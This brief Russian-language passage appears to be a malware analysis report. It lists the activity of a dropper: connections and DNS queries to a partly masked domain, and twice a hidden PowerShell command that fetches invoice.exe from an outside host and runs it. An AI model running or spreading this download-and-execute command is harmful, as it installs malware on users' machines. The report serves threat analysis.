Техническая информация
- http://www.trileisure.com/modules/invoice.exe как %temp%\invoice.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.trileisure.com/modules/invoice.exe','%TEMP%\invoice.exe'); Start-Process('%TEMP%\invoice.e...
- 'tr###isure.com':80
- 'tr###isure.com':443
- http://www.tr###isure.com/modules/invoice.exe
- 'tr###isure.com':443
- DNS ASK tr###isure.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.trileisure.com/modules/invoice.exe','%TEMP%\invoice.exe'); Start-Process('%TEMP%\invoice.e...' (со скрытым окном)